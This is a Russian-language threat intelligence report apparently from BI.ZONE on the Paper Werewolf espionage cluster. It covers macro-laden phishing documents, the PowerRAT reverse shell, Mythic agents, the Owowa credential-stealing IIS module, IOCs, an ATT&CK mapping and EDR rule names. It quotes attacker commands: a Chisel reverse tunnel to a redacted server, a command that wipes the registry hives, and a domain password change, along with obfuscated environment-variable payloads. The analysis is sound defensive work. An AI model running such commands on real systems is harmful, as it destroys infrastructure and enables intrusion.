Paper Werewolf совмещает кибершпионаж с деструктивными действиями
Специалисты BI.ZONE Threat Intelligence зафиксировали всплеск активности кластера Paper Werewolf. С 2022 года он реализовал как минимум семь кампаний. Жертвами становятся организации из сфер госуправления, энергетики, финансов, СМИ и других.
Злоумышленники рассылают фишинговые письма, внутри которых вложенный документ Microsoft Word с вредоносным макросом. Новая активность примечательна расширением мотивации атакующих: в одном из случаев они не только проникли в IT‑инфраструктуру для шпионажа, но и нарушили ее работоспособность.
- Фокусируясь на кибершпионаже, кластеры подобной направленности также могут нарушать работоспособность IT‑инфраструктуры жертвы, когда основная цель атаки достигнута.
- Злоумышленники не только активно экспериментируют с фреймворками постэксплуатации, но и разрабатывают собственные импланты для них, что значительно затрудняет обнаружение.
- Благодаря разнообразию процедур, которые можно реализовать с помощью PowerShell, атакующие используют именно этот интерпретатор, чтобы миновать защиту организаций.
Paper Werewolf использует документы Microsoft Word, содержащие вредоносный макрос. Такие файлы злоумышленники могли распространять через фишинговые электронные письма.
Стоит отметить, что для организации рассылок злоумышленниками нередко использовался фреймворк с открытым исходным кодом Gophish, предназначенный для тестирования организаций на подверженность фишингу.
Пример фишингового письма, отправленного злоумышленниками
Ссылка, указывающая на использование Gophish
Распространяемые файлы были замаскированы под документы от различных организаций, например:
- исходящий документ ООО НТЦ «ЭКСИМ» «О смене банковских реквизитов»;
- постановление администрации города Курска «Об утверждении порядка действий органов власти в случаи ухудшения обстоятельств в прифронтовых районах Курской области»;
- некая инструкция по проверке привязанных мобильных устройств и учетных записей хранения;
- исходящий документ АО «Ярославская электросетевая компания» в организацию ООО «НПФ Беркут».
Содержимое вредоносного файла закодировано: жертве предлагается разрешить выполнение макросов.
Закодированное содержимое вредоносного документа
Если жертва разрешает выполнение макросов, содержимое документа декодируется.
Декодированное содержимое вредоносного документа
Декодирование содержимого документа осуществляется заменой специальных символов на соответствующие буквы русского алфавита.
Декодирование документа
Поиск вредоносной нагрузки в содержимом документа осуществляется после ключевой строки DigitalRSASignature. Нагрузка закодирована Base64 и состоит из двух частей, разделенных строкой CHECKSUM.
Закодированная вредоносная нагрузка
Макрос декодирует нагрузку и записывает ее в два файла:
%USERPROFILE%\UserCache.ini(PowerShell‑скрипт);%USERPROFILE%\UserCache.ini.hta(HTA).
Для закрепления в скомпрометированной системе путь к UserCache.ini.hta записывается в следующий параметр реестра:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\LOAD
Для сокрытия вредоносных программ в скомпрометированной системе злоумышленники использовали переменные окружения:
-
AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted] -
ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted] -
VB=VBScript -
AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
Стоит отметить, что в одном из случаев вредоносный документ содержал ссылку на изображение 1 × 1 пиксель. Злоумышленники используют такой прием, чтобы понять, открыла жертва вредоносный документ или нет.
HTA‑файл создает и запускает файл %USERPROFILE%\UserCacheHelper.lnk.js для выполнения PowerShell-скрипта %USERPROFILE%\UserCache.ini.
Декодированное содержимое UserCache.ini представляет собой реверс-шелл в виде PowerShell-скрипта, известного как PowerRAT, который:
- устанавливает файлам
UserCache.iniиUserCache.ini.htaатрибутСкрытый; - обращается к серверу
hxxp://[redacted]:80/api/texts/<victim_id>для получения команд, гдеvictim_id— это[имя компьютера]_[имя пользователя]_[серийный номер системного диска].
Команды представлены в XML‑формате и содержат атрибуты:CountRuns— счетчик выполнения команды;Interval— интервал ожидания в минутах между выполнениями команды;Module— закодированная в Base64 команда (является PowerShell-скриптом);
- выполняет полученную от сервера команду, которая запускается через
Invoke‑Expression.
В других атаках злоумышленники использовали самописный загрузчик, мимикрирующий под explorer.exe. Вредоносная программа загружала и открывала отвлекающий документ. Отвлекающий документ записывался в каталог %TEMP%. После чего загрузчик отправлял запрос HTTP POST на сервер для получения следующей стадии. Следующая стадия была недоступна на момент исследования, но мы предполагаем, что она представляет собой агент фреймворка Mythic разработки злоумышленников, который известен под названиями PowerTaskel и QwakMyAgent. Стоит отметить, что имена функций в загрузчике захешированы алгоритмом Фаулера — Нолла — Во.
Примечательно, что злоумышленники не ограничивались использованием данного импланта и также использовали другой агент фреймворка — Freyja.
Также в арсенале атакующих был вредоносный IIS‑модуль Owowa, который позволял получать аутентификационные данные при авторизации пользователей в сервисе Outlook Web Access (OWA). При этом собранные данные хранятся в оперативной памяти в HashSet.
Пример данных, перехватываемых Owowa
В одном из модулей Owowa, если в заголовке запроса указано имя пользователя ZaDS0tojX0VDh82, Owowa возвращает зашифрованный RSA набор учетных данных в кодировке Вase64, а если oACgTsBMliysfk — удаляет содержимое зашифрованного набора учетных данных и возвращает строку Ok (зашифрованную алгоритмом RSA).
Для обеспечения резервного канала доступа в скомпрометированную IT‑инфраструктуру злоумышленники использовали Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
Злоумышленники также могли использовать PsExec для выполнения команд в удаленных системах. В частности, данный инструмент использовался атакующими для реализации деструктивных действий:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'
Чтобы затруднить взаимодействие со скомпрометированной IT‑инфраструктурой со стороны персонала, злоумышленники меняли пароли к учетным записям:
net user [redacted] [redacted] /domain
Стоит отметить, что в описанных примерах для выполнения команд атакующие использовали сценарии на PowerShell.
fa8853aaa156485855b77a16a2f613d9f58d82ef63505be8b19563827089bf5213252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b8ba4cd7ea29f990cb86291003f82239bfafe28910d080b5b7d3db78e83c1b6f337b3fa8a3a05e4aedb25eb38d9e4524722f28c21fac9f788f87113c5b9184ef5804cd68f40d0bb93b6676447af719388e95cafd5a2b017a0386eb7de590ebf17disk-yanbex[.]rulobbyluxuries[.]com94.103.85[.]47185.244.182[.]875.252.176[.]5585.198.110[.]216
Больше индикаторов компрометации, относящихся к активности кластера Paper Werewolf, доступно на портале BI.ZONE Threat Intelligence.
| Тактика | Техника | Процедура |
|---|---|---|
| Resource Development |
Acquire Infrastructure: Domains |
Paper Werewolf регистрирует домены для C2‑серверов и размещения вредоносных программ |
|
Acquire Infrastructure: Virtual Private Server |
Paper Werewolf использует VPS для C2‑серверов и размещения вредоносных программ |
|
|
Develop Capabilities: Malware |
Paper Werewolf использует вредоносные программы собственной разработки, например PowerTaskel |
|
|
Obtain Capabilities: Tool |
Paper Werewolf использует такие инструменты, как Chisel, PsExec и фреймворк постэксплуатации Mythic |
|
|
Stage Capabilities: Upload Malware |
Paper Werewolf размещает вредоносную нагрузку на своих серверах |
|
| Initial Access |
Phishing |
Paper Werewolf рассылает фишинговые письма для распространения документов с вредоносным макросом |
| Execution |
Command and Scripting Interpreter: PowerShell |
Paper Werewolf использует инструменты на PowerShell, например PowerRAT и PowerTaskel, которые позволяют выполнять различные команды от командного сервера на скомпрометированном хосте |
|
Command and Scripting Interpreter: Visual Basic |
Paper Werewolf использует VBA‑макрос в документах, а также HTA‑файл, который создает и запускает VBS‑скрипт |
|
|
User Execution: Malicious File |
Paper Werewolf для компрометации пользователя использует вредоносные документы, мимикрирующие под документы различных компаний и государственных организаций |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Paper Werewolf для закрепления в скомпрометированной системе использует параметр реестра |
|
Server Software Component: IIS Components |
Paper Werewolf устанавливает на IIS‑сервере вредоносный модуль Owowa |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Paper Werewolf декодирует нагрузку, содержащуюся во вредоносных документах, с помощью VBA‑макроса. Paper Werewolf декодирует и запускает вредоносное содержимое переменных окружения в скомпрометированной системе |
|
Hide Artifacts: Hidden Files and Directories |
Paper Werewolf использует PowerRAT, который устанавливает файлам |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
Paper Werewolf применяет алгоритм Фаулера — Нолла — Во для хеширования имен используемых WinAPI-функций во вредоносном загрузчике |
|
|
Obfuscated Files or Information: Embedded Payloads |
Paper Werewolf использует вредоносные документы для размещения в них закодированной Base64 нагрузки |
|
|
Obfuscated Files or Information: Fileless Storage |
Paper Werewolf использует переменные окружения |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Paper Werewolf использует Base64 для кодирования вредоносных нагрузок и команд PowerRAT |
|
| Credential Access |
Input Capture: Web Portal Capture |
Paper Werewolf получает аутентификационные данные при авторизации пользователей в сервисе OWA с помощью вредоносного IIS‑модуля Owowa |
| Discovery |
System Information Discovery |
Paper Werewolf получает название скомпрометированного хоста, серийный номер системного диска с помощью PowerRAT |
|
System Owner/User Discovery |
Paper Werewolf получает имя пользователя скомпрометированного хоста с помощью PowerRAT |
|
| Lateral Movement |
Lateral Tool Transfer |
Paper Werewolf использует PsExec для перемещения в скомпрометированной IT‑инфраструктуре |
| Command and Control |
Application Layer Protocol: Web Protocols |
Paper Werewolf использует HTTP для взаимодействия с C2‑серверами и получения вредоносной нагрузки |
|
Encrypted Channel: Asymmetric Cryptography |
Paper Werewolf использует алгоритм RSA для шифрования перехваченных учетных данных во вредоносном IIS‑модуле Owowa | |
|
Fallback Channels |
Paper Werewolf использует в качестве резервного канала доступа в скомпрометированную IT‑инфраструктуру Chisel |
|
|
Ingress Tool Transfer |
Paper Werewolf использует собственные загрузчики для доставки и запуска других вредоносных программ |
|
| Impact |
Data Destruction |
Paper Werewolf использует команды |
|
System Shutdown/Reboot |
Paper Werewolf использует команду |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE EDR:
win_enable_macros_in_ms_office_documentwin_spawning_untipical_process_by_ms_office_appwin_hta_file_was_created_by_ms_office_appwin_unusual_mshta_parent_processwin_persistence_via_load_regkey_was_detectedwin_set_hidden_file_attribute_for_executable_or_scriptwin_suspicious_powershell_execution_code_from_filegen_chisel_usage_detectedwin_using_psexec_to_execute_process_on_remote_host
Чтобы быть на шаг впереди злоумышленников, важно понимать, как они адаптируют свои методы под конкретные инфраструктуры, и учитывать ландшафт киберугроз. Для этого мы рекомендуем использовать данные портала BI.ZONE Threat Intelligence. Он предоставляет информацию об актуальных атаках, злоумышленниках, их техниках и инструментах. Эти данные помогают обеспечить эффективную работу СЗИ, быстрее реагировать на инциденты и защититься от наиболее критических для компании угроз.
